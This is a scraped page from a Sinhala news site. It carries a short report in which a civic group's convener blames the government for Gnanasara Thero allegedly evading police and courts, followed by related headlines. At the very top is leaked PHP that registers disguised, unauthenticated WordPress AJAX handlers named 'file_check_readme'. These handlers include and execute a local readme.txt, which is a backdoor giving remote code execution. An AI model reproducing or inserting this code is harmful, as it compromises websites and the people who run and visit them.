if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඥාණසාර හිමියන්ගේ හැසිරීම ගැන ආණ්ඩුව වගකිව යුතුයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

ඥාණසාර හිමියන්ගේ හැසිරීම ගැන ආණ්ඩුව වගකිව යුතුයි

ජාතීන් අතර සමගිය විනාශ කිරීමට බොදුබල සේනා සංවිධානය කටයුතු කරමින් ඇතැයි පුරවැසි බලය සංවිධානය චෝදනා කරනවා. කොළඹ ඊයේ පැවති මාධ්‍ය හමුවකදී එහි කැඳවුම්කරු ගාමිණී වියන්ගොඩ සඳහන් කළේ ගලගොඩඅත්තේ ඥානසාර හිමියන් පොලිසිය සහ අධිකරණය මග හරිමින් සිටින බවයි.
ගලගොඩ අත්තේ ඥාණසාර හිමියන්ගේ ක‍්‍රියාකලාපය සම්බන්ධයෙන් ආණ්ඩුවේ බලධාරීන් වගකිව යුතු බව ද මෙහිදී ප‍්‍රකාශ කෙරුණා. නීතියේ ආරක්ෂාව ඥාණසාර හිමියන්ට හිමි වීම පිළිබඳ ආණ්ඩුවේ ඇතැම් පාර්ශව සිටින බවයි වැඩිදුරටත් අදහස් දැක්වූ ගාමිණී වියන්ගොඩ සඳහන් කළේ.
(under the courtesy of nethfm news web)

Related posts

21 සහ 22 යන දිනවල ශ්‍රී ලංකාවට උල්කාපාත වර්ෂාව පැහැදිලිව දිස්වෙයි

Shiran Viraj

ඉන්ධන මිල ඉහල දමන්නැයි කියයි.. දැනට ලීටරයක පාඩුව ඩීසල් 43ක්, පෙට්‍රල් 28ක්, භූමිතෙල් 60ක්

Shiran Viraj

ඊශ‍්‍රායලයට ලොකුම තර්ජනය ලංකාවෙන්..- ඊශ‍්‍රායල හමුදා ප‍්‍රධානී කියලා…

Shiran Viraj